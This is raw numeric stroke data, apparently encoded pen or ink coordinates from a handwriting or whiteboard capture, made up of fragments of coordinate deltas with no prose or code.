0,'18'-17'156,"105"17"-140,53 0-16,54 0 16,17 0-16,-71 0 15,36 0-15,-71 0 16,0 0-16,35 0 15,-105 0-15,-36 0 16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07.9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77 6121 0,'18'17'0,"-1"-17"16,1 0-16,88 18 16,17 0-16,54-1 15,34-17-15,54 0 16,17 0-16,0 0 15,18 0-15,35 0 16,-105 0-16,-19 0 16,-70 0-16,-70 0 15,-36 0-15,-35 18 125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17.5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58 7796 0,'17'0'47,"1"0"-31,-1 0-1,54 0-15,0 0 16,34 0-1,1 0-15,35 0 0,0 0 16,36 0-16,-36 0 16,18 0-1,-18 0-15,-18 0 16,1 0-16,-36 0 0,-35 0 16,-18 0-1,-17 0-15,-1 0 16,1 0 31,0 0-32,-1 0 1,1 0 0,0 0-1,-1 0-15,19 0 16,16 0-16,-16 0 15,34 0-15,18 0 16,18 0-16,35 0 16,36 0-16,-1 0 15,1 0-15,-36 18 16,-35 17-16,-36 1 16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28.0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08 7973 0,'17'-18'63,"19"1"-48,34-19-15,71 1 16,18 17-16,0 1 16,88 17-16,-36-18 15,19 18-15,-19 0 16,1 0-16,-35 0 15,-1 0-15,-17 0 16,-36 0-16,-52 0 16,-36 0-16,-17 0 234,-1 0-218,54 18-16,-1-18 15,36 17-15,18-17 16,17 18-16,-35-18 16,70 0-16,-53 18 15,-17-18-15,0 0 31,-88 0-3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29.3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98 9825 0,'18'-18'94,"53"18"-79,52 0-15,89 0 16,52 0-16,54 0 16,17 0-16,0 0 15,0 0-15,-70 0 16,-54 0-16,-69 0 15,-72 0-15,-35 0 16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32.1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13 10019 0,'0'0'0,"-35"0"0,0-18 16,0-17-16,-1 35 15,-17-35-15,36 17 16,-19 0-16,1-17 16,17 35-16,18-18 15,-17 1-15,17-1 16,-18-17-16,1 17 15,17 1-15,-18-19 16,18-17-16,-18 36 16,18-18-1,0-1-15,-17 1 16,17-18-16,0 18 16,0-18-16,0 18 15,0-1-15,0-17 16,0 18-16,0 0 15,0-18-15,0 0 16,35-18-16,-17-17 16,17 35-16,-18 0 15,36-35-15,-35 71 16,17-36-16,-17 35 16,17 0-16,-17 1 15,17 17-15,53 0 31,-52 0-31,34 0 0,-17 0 16,18 35-16,-18-35 16,-1 18-16,37 17 15,-54-17 1,0-1-16,0 1 0,-17-18 16,0 18-1,-1-1-15,1 1 16,0-1-16,-18 1 15,17 35-15,-17 0 16,0 0-16,18 17 16,0-17-16,-18 0 15,17-17-15,-17 16 16,0 1-16,0 0 16,0-17-16,0 16 15,0-16-15,0-1 16,0-17-16,0-1 15,0 19-15,0-19 16,-17-17 0,-1 18-16,-17-1 15,-1 19-15,19-19 16,-19 19-16,-34-1 16,35 0-16,-1-17 15,1-1-15,-18 1 16,53 0-16,-17-1 15,-1 1-15,0-18 16,18 18-16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19:33.6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42 9596 0,'36'0'31,"-19"0"-31,54 0 16,-18 0-16,35 0 15,35 0-15,18-18 16,0 0-16,54 18 16,-54 0-16,-36 0 15,19 0-15,-36 0 16,18 0-16,-53 0 15,17 0-15,-34 0 16,17 0-16,-18 0 16,0 0-16,-17 0 15,-1 0-15,1-17 16,0 17 0,-1 0-1,-17-18 1,18 18-16,0 0 15,-1 0 1,1 0-16,0 0 16,-18-18-1,17 18 1,1 0-16,-1-17 16,1 17-1,0 0 1,-1 0-1,1-18-15,0 18 16,17-18-16,36 18 16,-19 0-16,1 0 15,-17 0-15,-1 0 16,0 0-16,-17 0 16,-1 0-1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1:22.2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22 5803 0,'17'0'62,"1"0"-31,17 0-15,-17 0 0,17 0-16,-17 0 15,17 0 1,-17 0-1,-1 0-15,1 0 16,-1 0-16,1 0 16,17 0-16,-17 0 15,17 0 1,-17 0-16,0 0 16,-1 0-16,1 0 15,0 0-15,-1 0 16,18 0-16,-17 0 15,17 0-15,1 0 16,17 0-16,-1-17 16,1 17-16,0 0 15,18 0-15,-18 0 16,17 0-16,-17 0 16,18 0-16,-18 0 15,17 0 1,-17 0-16,18 0 0,-18 0 15,0 0-15,-1 0 16,-16 0-16,17 0 16,-18 0-16,0 0 15,1 0 1,-19 0-16,36 0 16,-35 0-16,-1 0 15,19 0-15,-19 0 16,19-18-16,-19 18 15,1 0-15,35 0 16,-18 0-16,0 0 16,18 0-16,-18 0 15,1 0-15,17 0 16,0 0-16,-18 0 16,35 0-16,-17-18 15,-17 18-15,69-17 16,-52 17-16,0 0 15,18 0-15,-1 0 16,1 0-16,-18 0 16,17 0-16,1 0 15,-18 0-15,0 0 16,17 0-16,1 0 16,17 0-16,18 0 15,-18 0-15,18 0 16,0 0-16,17 0 15,-17 0-15,0 0 16,17 0-16,1 0 16,-1 0-16,107 0 31,-107 17-31,18 1 16,-70-18-16,52 18 15,-17-1-15,-35 1 16,34-1-16,-34-17 15,0 0-15,52 0 16,-35 0-16,36 0 16,-36 0-16,35 0 15,-34 0-15,16 0 16,19 0-16,-36 0 16,36 0-16,-19 0 15,1 0-15,-35 0 16,-1 0-1,19-17-15,-19 17 16,1-18-16,-36 18 16,18 0-16,0 0 0,17 0 15,-17 0 1,35 0-16,-17 0 16,35 0-16,0 35 15,17 1-15,-17-1 16,-18-35-16,36 18 15,-54-1-15,1-17 16,-18 18-16,-18-18 16,0 0-16,-17 0 15,17 0-15,0 0 16,-17 0 0,17 0-16,-17 0 15,0 0-15,-1 0 16,36 0-16,-18 0 15,18 0-15,0 0 16,0 0-16,0 18 16,18-18-16,-1 17 15,-17-17-15,0 18 16,0-18-16,0 0 16,-35 0-16,-1 17 15,1-17-15,17 0 16,-17 0-16,-1 0 15,36 0-15,-17 0 16,16 0-16,1 0 16,0 0-16,0 0 15,-17 0 1,-19 0-16,1 0 16,-1 0-1,1 18 16,0-18-15,-1 0 0,1 0-1,0 0 1,-1 0 0,-17-18-1,18 1 1,0-1-16,-1 1 62,1 17-15,-1 0-47,19 0 0,-19 0 16,36 0-1,-35 0 1,0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1:32.5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39 6597 0,'-18'0'62,"1"0"-46,-19 0-16,19 0 16,-19 0-16,-16 0 15,-1 0-15,-18 0 16,-52 0-16,34 0 16,-34 0-16,-18 0 15,17 0-15,18 0 16,-35 0-16,18 0 15,-1 0-15,36 0 16,-18 0-16,18 0 16,53 0-16,-18 0 15,35 0-15,-17 0 16,0 0-16,17 0 16,1 0-1,-1 0-15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5:04.9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60 12929 0,'18'0'78,"17"0"-62,18 0-16,17 0 15,18 0-15,18 0 16,35 0-16,-35 0 16,71 0-16,-36 0 15,-88 0-15,0 0 16,-71 0 17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21.3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44 8436,'0'0,"18"0,19 0,17 0,19 0,17 0,56 0,-38 0,38 0,-56 0,37 0,0 0,0 0,-36 0,-18 0,54 0,0 0,-73 0,19 0,17 0,-35 0,-1 0,1 0,-19 0,-18 0,18 0,-18 0,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5:06.6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488 12735 0,'0'-17'63,"36"17"-48,17-18 1,-1 0-16,37 1 15,-19 17-15,36 0 16,0 0-16,17 0 16,1 0-16,-18 0 15,35 0-15,-18 0 16,36 17-16,0 1 16,-1 0-16,19-1 15,17 1-15,-53-18 16,0 0-16,-35 0 15,17 0-15,-52 0 16,0 0-16,-19 0 16,1 0-1,0 0-15,-17 0 0,16 0 16,19 0-16,17 0 16,53 0-1,0 0-15,18 18 0,-18-1 16,53-17-1,-35 0-15,17 0 16,-17 18-16,-18-18 16,0 0-16,18 0 15,-35 0-15,17 0 16,-18 0-16,1 0 16,-36 0-16,-18 0 15,36 0-15,-35 0 16,17 0-16,-17 0 15,17 0-15,0-18 16,35 18-16,36-35 16,0 17-16,17 18 15,36-17-15,282 17 32,-212 0-32,18 0 0,-71 0 15,-88 0-15,-105 0 16,-19 0-1,1 0-15,0 0 16,-1 0-16,19 0 31,-19 0-15,1 0 15,-1-18-31,1 18 16,-18-18-1,18 18-15,-18-35 16,17 35 0,1-18-16,-18 1 15,18-1 1,-18 1-16,17 17 16,-17-18-16,18 18 15,0 0 63,-18 18-31,0-1-31,0 36-1,-18-18-15,18-17 16,0 17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5:08.5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488 12841 0,'0'0'0,"0"-18"15,-17 18 17,-1 0 14,0 0-46,1 0 16,-19-17 0,1 17-16,0 0 15,-36-18-15,18 1 16,1-1-16,-1 18 16,0 0-16,0-18 15,18 18-15,-18 0 16,35 0-16,0 0 62,1 0-46,-1 0 31,18 18-47,-18-18 140,18 18-124,-17-18 0,-1 0-16,1 0 15,-19 0-15,19 0 16,-1 0-16,-17 0 16,-1 0-16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5:09.2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36 12788 0,'17'0'47,"1"0"-47,17 0 16,1 0-1,-19 0-15,19 0 16,-1 0-16,0 0 16,0 0-16,-17 0 15,17 0 1,-17-17 0,0 17-16,-18-18 15,17 18 1,1 0-16,0 0 31,-1-18-15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25:13.9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054 12735 0,'-35'0'31,"17"0"-15,-17 18-1,17-18 1,-35 18-16,-53-18 16,-35 0-16,-35 0 15,-388 0 1,87 0-1,1 0-15,-53 0 16,0 0-16,52 0 16,1 0-16,-18 0 15,-35 0-15,53 0 16,88 0-16,123 35 16,1 0-16,52-17 15,0-1-15,-282-17 31,371 0-31,17 0 16,53 0-16,0 0 16,18 0-1,-18 0-15,-17 0 0,-1 0 16,0 0-16,1 0 16,-54 0-1,19 0-15,-54 0 0,0 0 16,-53 0-16,54 0 15,-1 0 1,18 0-16,35 0 0,53 0 16,35 0-16,1 0 15,-1 0 1,-17 0 0,17 0-1,1 0-15,-1 0 16,-17 0 31,17 0-47,-70-17 15,17-1 1,-17 18-16,35 0 16,-17 0-16,17 0 15,17 0-15,1 0 16,0 0-16,17 0 15,-17-18-15,17 18 16,1 0 0,-1 0-16,-17 0 15,17 0-15,0 0 16,1 0-16,-18 0 16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31:30.4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96 5397 0,'20'0'31,"-20"-20"-15,20 20-16,-1 0 31,1 0-16,20 0-15,20 0 16,39 0-16,40 20 16,19 40-16,21-1 15,-20-19-15,39 0 16,-19-20-16,-1-20 16,21 0-16,-40 0 15,-1 0-15,-19 0 16,-40 0-16,-19 0 15,-1 0-15,-39 0 16,19 0-16,1 0 16,-1 0-16,-19 0 15,0 0-15,0 0 16,-1 0 0,-19 0-1,20 0 1,-20 19-1,-1-19 1,1 0 0,0 0-16,20 0 15,-20 0 1,19 0-16,-19 0 16,0 0-1,0 0 1,0 0-16,0 0 15,-1 0 1,1-19 0,40-1-16,-21 20 15,-19-40-15,40 20 16,-20 0-16,-1 0 16,1-19-1,-20 39 1,-20-20 15,20 20 16,-1 0-16,1 0 47,0 0-62,0 0 0,0 0-1,0 0 1,0 0-16,19 0 15,-19 0 1,20 0-16,19 0 16,-19 0-16,19 0 15,1 0-15,0 0 16,-21 0-16,1 0 16,-20 0-16,0 0 15,19 0-15,-19 0 16,0 0-16,0 0 15,0 0 1,-1 0 0,1-20-16,0 20 15,0 0 1,0 0 0,0 0 15,0 0 0,-1 0-15,-19-20-16,20 20 15,0 0 1,-20-20-16,20 20 16,0 0-16,0 0 15,-1-19-15,1 19 16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31:31.7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39 5258 0,'-20'0'47,"0"0"-31,-20 0 0,1 0-1,-21 0-15,0 0 0,-19 0 16,20 0-1,-1 20-15,20-20 16,-19 40-16,-1-20 16,40-20-16,-59 0 15,20 0-15,-21 0 16,1 0-16,-1 0 16,1 0-16,0 0 15,19 0-15,1 0 16,-1 0-16,1 0 15,-1 0-15,20 0 16,20 0-16,1 0 16,-21 0-16,0 0 15,20 0-15,-19 0 16,-1 0-16,0 0 16,-19 0-16,19 0 15,0 0 1,1 0-16,-1 0 15,-39 20-15,19-20 16,-19 0-16,-1 0 16,1 0-16,0 0 15,-1 0-15,21 0 16,-1 0-16,1 0 16,19 0-1,-39 0-15,39 0 0,-20 0 16,21 0-1,-21 0-15,20 0 16,1 0 0,-1 0-16,-19 0 15,-1 0-15,1 0 16,-1 0-16,0 0 16,21 0-16,-1 0 15,-19 0-15,19 0 16,0 0-16,-19 0 15,19 0-15,0 0 16,-19 0-16,19 0 16,20 0-16,0-20 15,-19 20-15,19 0 16,0 0 0,0 0-16,0 0 15,0 0 1,1 0-1,19-20 1,-20 20 0,0 0-16,0 0 15,0-20 1,0 20 0,1 0-1,-1 0 1,20-20-16,-40 20 15,20 0 1,0 0 0,-19-20-16,19 0 15,-20 1-15,20 19 16,-39 0 0,59-20-16,-20 20 15,0 0-15,0 0 16,0 0-16,1 0 15,-1-20 1,0 20-16,0 0 16,0 0-1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31:32.4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96 5159 0,'20'0'31,"19"0"-15,81 0-16,58 0 15,80 0-15,20 0 16,39 0-16,80 0 16,20 0-16,-20 0 15,-80 0-15,-79-20 16,-39-19-16,-80-21 16,-40 20-16,-39 40 15,0-19 1,-20-1-16,-1 20 15,1-20-15,0 20 16,0 0-16,0 0 16,0 0 15,0 0 0,-1 0 0,1 0-15,20 0-16,39 0 16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2:37:40.7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47 15359 0,'20'0'79,"0"0"-79,20-20 15,19 20-15,21 0 16,19 0-16,60 0 15,-100 0-15,120 0 16,39 0-16,20 0 16,20 0-16,40 0 15,-20 0 1,19 0-16,-59 0 0,20 0 16,-20 0-1,1 0-15,-1 0 16,0 0-16,20 0 15,0 0-15,0 0 16,59 0-16,80 0 16,-278 0-16,238 0 15,40 0-15,-119 0 16,20 0-16,-100 0 16,1 0-16,-100 0 15,20 0-15,-20 0 16,0 0-16,20 0 15,-19 0-15,58 0 16,-19 0-16,40 0 16,19 0-16,-19 0 15,-1 0-15,-98 0 16,138 0-16,20 0 16,-59 0-16,39 0 15,0 0-15,-59 0 16,40 0-16,-1 0 15,-39 0-15,19 0 16,-39 0-16,-40 0 16,-19-20-16,-1 20 15,-19 0-15,-21 0 16,1-20-16,-20 0 16,0 20-1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9:23.7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07 15319 0,'0'0'0,"20"-20"0,0 0 16,-1 20 0,1 0-1,0 0-15,59 0 16,-19 0-16,0 0 16,19 0-16,40 0 15,40 0-15,39 0 16,-19 0-16,59 0 15,-40 0-15,40 0 16,-39 0-16,39 0 16,-79 0-1,-40 0-15,20 0 0,0 0 16,-40 0 0,40 0-16,0 0 15,-20 0-15,-60 0 16,100 0-16,20 0 15,-21 0-15,1 0 16,59 0-16,1 40 16,-61-20-16,21-20 15,-20 20-15,0-20 16,-21 20-16,-19-20 16,1 0-16,18 0 15,1 0-15,20 0 16,-20 0-16,-20 0 15,-59 0-15,39 0 16,20 0-16,-20 0 16,-20 0-16,1 0 15,-21 0-15,1 19 16,-20-19-16,-21 0 16,21 0-16,0 0 15,19 0 1,21 0-16,-1 0 0,40 0 15,0 0 1,20 0-16,20 0 16,-100 20-16,60-20 15,20 20-15,-59-20 16,19 20-16,-40-20 16,-19 0-16,0 0 15,0 0-15,-1 0 16,1 0-16,19 0 15,1 0-15,-40 0 16,59 0-16,20 0 16,40 0-16,40 0 15,-20 0-15,39 0 16,-39 0-16,-40 0 16,-79 0-16,19 0 15,1 0-15,-1 0 16,-19 0-16,0 0 15,19 0-15,1 0 16,39 0-16,0 0 16,40 0-16,0 0 15,-40 0-15,20 0 16,-39 20-16,-21-20 16,-19 0-16,-1 0 15,-19 0 1,0 0-1,0 0 1,0 0 0,0 0-1,0 20-15,-1-20 16,1 0-16,0 0 16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9:25.3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12 15537 0,'0'0'0,"79"0"0,60 0 16,99 0-16,79 0 16,180 0-16,38 0 15,120 0-15,-20 0 16,-40 0-16,-59 0 16,-337 0-16,237 0 15,1 0 1,-60 0-16,0 0 0,-40 0 15,-59 0-15,20 0 16,-60 0 0,-20 0-16,20 0 15,0 0-15,-19 0 16,-1 0-16,-20 0 16,1 0-16,-40 0 15,-60 0-15,-40-39 16,-39 39-16,0-20 15,0 20 1,-20-20 0,20 20 31,0 0-32,19 0 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6:32.093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4463 13008,'37'0,"-19"0,18 0,37 0,-19 0,37 0,36 0,0 0,-37 0,37 19,0-19,0 18,-18 0,55 0,-56 0,74-18,-55 0,18 0,18 18,1-18,35 0,-36 0,55 0,-18 0,-37 0,37 37,-1-37,-36 18,1-18,35 0,-35 0,-19 0,-18 0,0 0,18 0,-36 0,0 0,-19 0,19 0,-18 0,18 0,-37 0,37 0,18 0,0 0,18 0,0 0,1 0,53 0,-36 0,1 0,-37 0,-37 0,56 0,-56 0,1 0,0 0,36 0,-18 0,-37-18,-17 18,-19 0,0 0,19 0,-19 0,-18 0,0 0,37 0,-37 0,0 0,0 0,0 0,18-19,-17 19,35 0,-18 0,1 0,-1-18,-18 18,18 0,-18 0,19 0,-19 0,0-18,0 18,0 0,-18-18,18 18,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22.3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83 8582,'18'0,"18"0,-18 0,37 0,-1 0,0 0,19 0,18 0,-1 0,1 0,0 0,18 0,-37 0,1 0,54 0,54-19,1 19,-37 0,18 0,0 0,1 0,17 0,-36 0,0 0,-18 0,-36 0,36 0,-72 0,17 19,-17-1,-19 0,0 0,0 0,1-18,-19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9:31.3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48 15260 0,'0'-20'63,"20"20"-48,0 0 1,0 0-16,19 0 16,21 0-16,-40 0 15,19 0 1,-19 0-1,0 0 32,20 0-31,-1 0-16,21 0 16,0 0-1,-21 0-15,21 0 16,19-20-16,-19-20 15,39 20-15,-59 1 16,19-1-16,-39 20 16,20-20-16,19 20 15,1 0-15,-21 0 16,-19 0-16,0 0 16,0 0-1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39:36.9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49 10636 0,'39'0'16,"1"0"0,20 0-1,19 0-15,60 0 16,20 0-16,-1 0 16,21 0-16,39 0 15,-39 0-15,39 0 16,-39 0-16,-20 0 15,19 60-15,-79-21 16,20 1-16,-19 0 16,-81-21-16,61-19 15,-21 20-15,-19-20 16,0 0-16,19 0 16,1 0-16,-1 0 15,1 0-15,19 0 16,1 0-16,19 0 15,0 0 1,0 0-16,20 0 0,-39 0 16,-1 0-1,-19 0-15,-21 0 16,-19 0-16,0 0 16,0 0-16,0 0 15,0 0-15,-1 0 16,1 0-1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0:18.1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45 653 0,'-17'17'15,"-19"54"1,19-36-16,-19 36 16,19-36-16,-19 18 15,-17 17-15,18-17 16,-18 18-16,-17 17 15,-1 18-15,1 0 16,-36 17-16,0 18 16,-35-17-16,35-18 15,-53-1-15,36-16 16,35-54-16,-71 35 31,-3933-52-31,8131 0 0,-4057-18 16,18 17-16,-17-17 31,-1 18-31,-4057 17 0,8150 1 16,-4093-1-1,1 18-15,-1 0 16,18-36-16,0 1 16,0 0 30,-18-1 1,18 1-31,0 0-16,0 17 16,0 0-1,0 18-15,0-35 16,0 17-16,0-17 15,18-1 1,0-17 0,-1 0-1,19 36-15,-19-19 16,54 36-16,-18-35 16,53 52-16,-1-17 15,1 18-15,0 17 16,0-18-16,-36-17 15,-34-17-15,-1 17 16,18-18-16,-18 18 16,0 0-16,-17 0 15,0-18 1,-1 0-16,1 18 16,0-18-16,-1-17 15,1 17-15,0-35 16,-1 0 31,-17-17-47,0-19 15,0 1-15,0-35 16,0-19-16,0-52 16,0-70-16,0-19 15,0-52-15,-35-35 16,0 34-16,-89-405 31,71 336-31,-17-19 0,-54 18 16,-17 1-16,-123 334 15,70 18-15,-53 0 16,88 0 0,35 0-16,19 0 0,69 0 15,1 0 1,17 0-16,1 0 0,-19 18 15,1 17 1,0 35-16,0 19 16,35 17-16,0 17 15,0 18-15,0-35 16,88 88-16,-35-35 16,17-18-16,-17 18 15,0-36-15,35 53 16,-17-17-16,-36 18 15,53 17-15,-35 53 16,18 17-16,52 124 16,-35-53-16,-70-141 15,17 18-15,1-36 16,-36-34-16,0-1 16,0-53-16,0-18 15,0 1-15,0-36 16,0-17-16,17 17 15,-17-17-15,18-18 16,0 17-16,-1-17 16,1 18-1,0-18 17,-1 0 46,-17-18-78,18-52 15,35-1-15,0-87 16,17-36-16,-17-18 16,-18-88-16,18-53 15,53-88-15,35-35 16,-35 106-16,141-230 15,-18 176-15,71-140 16,-18 176-16,54 388 16,-19 0-16,36 0 31,-265 0-31,-88 35 62,0-17-46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12.9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68 7532 0,'18'0'31,"-1"0"-31,1 0 16,35 0-16,0 0 15,17 0-15,1 0 16,17 17-16,-17 1 16,-1-18-16,18 0 15,0 0-15,71 0 32,-53 0-32,-35 0 0,-1-18 15,18 1-15,-17 17 16,-18 0-16,-18 0 15,0 0-15,1 0 16,-19 0-16,1 0 16,0 0-1,17 0-15,-17 0 16,34 17-16,1-17 16,18 0-16,17 18 15,0 0 1,36-18-16,-18 0 15,-1 0-15,-34 0 16,17 0-16,-35 0 16,-18 0-16,-17 0 15,0 0-15,-1 0 16,1 0 15,0 0-31,-1 0 16,18 0-16,18 0 15,18 0-15,35 0 16,-18 17-16,35-17 16,1 0-16,17 0 15,18 0-15,-18 0 16,-18 0-16,-34 0 16,-37 0-16,-16 0 15,-19 0-15,1 0 31,-18 18-15,18 0 15,-18-1-15,0 1 93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15.5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833 7620 0,'18'-18'16,"-1"18"0,71-17-16,-17 17 15,35 0-15,0 0 16,-36 0-16,1 0 15,-1 0-15,-17 0 16,18 0-16,35 0 16,17 17-16,247 19 31,-158-1-31,-18-35 0,-35 0 16,-36 0-16,1 0 15,-71 0-15,-36 0 16,1 0-16,0 0 15,17 0 1,-17 18 0,-1-18-1,1 0 48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16.7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17 7638 0,'18'0'15,"17"0"1,-17 0-16,17 0 15,-17 0-15,35 0 16,35 0-16,35 17 16,19 1-16,69 17 15,1 18-15,17-35 16,18 17-16,-35-17 16,-53-18-16,-36 0 15,-88 0-15,-17 0 16,-18-18 328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1.5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58 16192 0,'17'0'47,"54"18"-47,52 35 16,71-18 0,18 36-16,105-18 15,36 0-15,-35 0 16,-71-53-16,-36 0 15,-34 17-15,-54-17 16,-52 0-16,-36 0 16,-17 0-1,-1 0 22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3.0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50 10336 0,'0'0'0,"35"0"0,36 0 16,0 0-1,17 0-15,18 0 16,17 0-16,18 0 15,-17-17-15,-1-1 16,-17 0-16,0 1 16,0-1-16,-36-17 15,-17 35-15,-18-18 16,1 1-16,-19 17 16,1 0-16,0 0 31,-1 0 47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4.2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62 16422 0,'0'-18'16,"17"18"-16,36 0 16,0 0-16,35 0 15,0 0-15,36 0 16,17 0-16,0 0 15,0 0-15,-17 0 16,17 0-16,-35 0 16,-1 0-16,-34 0 15,-36 0 1,1 0-16,-19 0 0,18-17 16,1 17-16,-1-18 15,0-17-15,18 35 16,0-36-1,-18 19-15,-17 17 0,17 0 16,-17-18 0,0 18-1,-1-18 1,1 18 0,17 0-1,-17 0 1,35 0-16,17 0 15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5.3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29 10742 0,'0'18'16,"-17"-18"-1,-36 0-15,0 0 16,0 0-16,-35-18 16,35 0-16,-18 18 15,18-17-15,-53 17 16,18 0-16,-53 0 15,0 0-15,0 0 16,-35 17 0,-1 19-16,-17-1 15,-53-17-15,53-18 0,-17 0 16,-1 0 0,35 0-16,72 0 15,-19 0-15,71 0 16,0 0-16,36 0 15,-1-18-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37.8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43 8237,'18'18,"18"-18,19 0,17 18,-17-18,35 0,19 0,-18 0,36 0,18 0,18 0,1 0,-37 0,18 0,0 0,-36 0,0 0,-1 0,-35 0,54 0,-54 0,17 0,-17 0,36 0,-37 0,1 0,-37 0,0 0,1 0,-19 0,0 0,18 0,19 0,-1 0,55 0,-18 0,72 0,55 0,-1 0,74 0,-19 18,54-18,37 18,-109-18,55 0,-128 19,1-19,-37 18,0-18,-54 0,17 0,-35 0,-19 18,-35-18,-1 0,0 0,0 0,0 0,18 0,-17 0,-1 0,36 0,37 0,-37 18,55-18,-36 0,-1 0,1 0,54 0,0 0,-36 0,36 0,-19 0,19 0,19 0,-19 18,18-18,-36 18,-19-18,19 18,-36-18,-37 0,-18 0,18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6.1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17 16439 0,'0'0'15,"-36"0"-15,-17-17 16,-17 17-16,-1-18 15,18 1-15,-17 17 16,35 0-16,-36 0 16,1 0-16,17-18 15,-53 0-15,18 18 16,-71-17-16,-18 17 16,19 0-16,-36 0 15,0 0-15,53-18 16,17 0-16,71 1 15,35-1 64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7.5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399 9402 0,'35'0'0,"106"-53"15,53 17-15,53-17 16,88 18-16,36-35 15,123 17-15,-1-18 16,-175 53-16,17 18 16,-106 0-16,-70 0 15,-124 0-15,-17 0 63,-18-17-6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1:28.5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149 16087 0,'0'0'0,"18"0"0,35 17 16,-36-17-16,36 0 15,0 18-15,0-18 16,18 18-16,-1-1 15,36-17-15,17 0 16,19 0-16,-1 0 16,-18 18-16,-17-1 15,-18-17-15,-17 18 16,-54-18-16,1 0 16,17 0-16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2:38.1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34 13123 0,'0'0'0,"-18"-17"62,1 17-46,-1 0-16,0 0 16,1 0-1,-1 0-15,-17-18 16,17 0 0,-17 18-16,17 0 15,1-17-15,-1 17 31,0 0-31,1 0 16,-19 0-16,19 0 16,-19 0-16,1 0 15,-18 0-15,0 0 16,0 0-16,1 0 16,16 0-16,-17 0 15,36 0-15,-1 0 16,0 0-16,1 0 15,-1 0 17,-17-18-17,17 18 1,1 0 31,-1 0 15,0 0-30,1 0-17,-19 0-15,19 0 16,-1 0-16,0 0 15,1 0 32,-1 0 16,1 0-32,-1 0 47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2:46.37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7073 5927 0,'18'0'32,"-1"0"-1,19 0-15,-1 17-1,18-17-15,0 0 16,53 18-16,17 0 15,-17-18-15,0 17 16,17-17-16,-34 0 16,16 0-16,-69 0 15,17 0-15,-36 0 16,1 0 0,-1 0-16,1 0 15,0 0 16,-1 0-31,1 0 47,35 0-47,-18 0 16,18 0-16,-18 0 16,36 0-16,17 0 15,-17 0-15,35 0 16,-18 0-16,-35 0 15,0 0-15,17 0 16,-52 0-16,35 0 16,-36 0-16,1 0 15,0 0 1,-1 0 0,1 0-1,0 0 1,17 0-16,-18 0 15,1 0 1,17 0-16,1 0 16,-19 0-16,1 0 15,0 0-15,-1 0 16,1 0 15,-1 0-15,1 0-16,0 0 15,-1 0 1,1 0 47,0 0-48,-1 0 1,1 0-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2:48.442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4357 13194 0,'-18'0'110,"-17"0"-95,-18-18-15,18 18 16,-1 0-16,19 0 15,-1 0-15,-17 0 16,0 0-16,-1 0 16,19 0-16,-19 0 15,-17 0-15,18 0 16,0 0-16,17 0 16,1 0-16,-1 0 15,0 0 1,1 0 31,-1 0-47,0 0 15,1 0-15,-18 0 16,17 0 0,0 0 62,1 0-63,-1 0 1,0 0 0,1 0-1,-1 0 1,0 0-1,1 0 1,-36-17-16,35-1 16,-17 18-1,17 0-15,1 0 16,-1 0-16,0 0 16,1 0-1,-1 0 32,18-18-47,-18 1 31,1 17 94,-1 0-109,1 0 31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2:54.681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0883 6050 0,'71'-18'78,"52"1"-78,18 17 16,53 0-16,18 0 15,17 0-15,-17 0 16,0 0-16,-36 0 15,18 0 1,-53 0-16,0 0 16,0 0-16,1 0 15,-1 17-15,-4092-17 16,8131 0-16,-4127 0 16,-36 0 46,1 0 79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2:56.138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5627 13053 0,'0'17'47,"-18"1"-31,1-18-16,-19 0 15,19 18-15,-1-18 16,-17 17-16,-1-17 15,-16 18-15,-1-18 16,-36 18-16,1-18 16,-18 0-16,18 0 15,-18 0-15,53 0 16,18 0 0,18 0 93,-1 0-93,0 0-16,-17 0 15,17 0 1,1 0-16,-1 0 15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3:10.6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55 13018 0,'-18'0'31,"0"0"-15,1 0-1,-1 0-15,0 0 16,-17 17-16,17-17 15,-4074 0 1,8149 0-16,-4074 0 16,-1 0-16,0 0 15,1 0-15,-19 0 16,1 0-16,0 0 16,0 0-16,-36 0 15,18 0 1,0 0-16,-17 0 15,17 0-15,17 0 0,-17 0 16,-141 0 15,89 0-31,34 0 16,1 0-16,34 0 16,1 0-1,17 18-15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3:11.7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25 13035 0,'17'18'47,"19"17"-47,34-17 16,18-1-16,-17 1 15,52 17-15,-52-17 16,17 17-16,-35-35 16,0 18-16,18-18 15,-36 0-15,53 17 16,0-17-16,18 18 16,-18 0-16,36-1 15,-1 1 1,-52 0-16,-1-18 0,-17 17 15,-35-17-15,0 0 32,-1 0-17,1 0 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38.7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67 9979,'36'0,"55"-19,-19 1,55 0,37-36,17 54,37-18,-37 18,19 0,-37 0,-36 0,-54 0,-19 0,-36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6:17.7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53 6112 0,'20'0'63,"59"0"-63,-39 0 15,59 0-15,0 0 16,-19 0-16,58 0 16,1 0-16,40 0 15,39 0-15,-39 0 16,-20-20-16,39 0 15,-19 20-15,-40 0 16,-60 0-16,0 0 16,-19 0-16,-21 0 15,21 0-15,-20-20 16,-20 0-16,19 0 16,1 20-16,0 0 15,-21 0-15,1 0 16,0 0-16,0 0 15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4:00.9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26 7320 0,'17'0'46,"1"0"-30,-1 0 0,54 0-16,0 0 15,-1 0-15,18 0 16,18 0-16,0 0 16,17 0-1,1 0-15,52 53 16,-35-35-16,-17-1 15,17 1-15,-106-18 16,-17 0-16,0 0 94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4:02.0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89 7408 0,'18'0'62,"52"18"-46,54 0-16,52-18 16,-17 0-16,53 0 15,-36 0-15,18 0 16,-18-18-16,-34 0 15,-54 18-15,18-17 16,-36 17 0,1 0-16,-1 0 15,1 0-15,-18 0 16,0 0-16,-18 0 16,0 0-16,0 0 15,-17 0 16,0 0-15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6:43.5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55 7342 0,'20'20'16,"20"19"-1,39-19 1,-19 20-16,79-20 16,0 20-16,0-1 15,0-39-15,-20 0 16,0 0-16,-20 0 16,-79 0-16,19 0 15,1 0-15,-20 0 16,0 0-1,0 0 17,-20-20 124,0 1-140,0-1-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04.4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947 13136 0,'0'-20'62,"39"1"-46,60-21-16,1 20 16,19 20-16,0 0 15,0 0-15,-20 0 16,-59 0-16,59 0 15,20 0-15,-20 0 16,40 0-16,0 0 16,-20 0-16,0 20 15,20 0-15,20 0 16,-20-20-16,-40 0 16,0 0-16,-59 0 15,19 0-15,-19 0 16,0 0-16,0 0 15,-21 0-15,1 0 16,0 0 0,0 0-16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07.0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79 13097 0,'0'-20'32,"19"20"-17,1 0 1,40 0 0,-40 0-16,59 0 15,0 0 1,1 0-16,59 0 15,-40 0-15,40 0 16,-40 0-16,40 0 16,20 0-16,-40 0 15,0 0-15,20 0 16,0 0-16,-40 0 16,-40 0-16,80 0 15,0 0-15,20 0 16,0 0-16,-1 0 15,-19 0-15,-39 0 16,-41 0-16,-19 0 16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07.7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490 14049 0,'19'0'63,"1"0"-63,40 0 15,19 40-15,-19-20 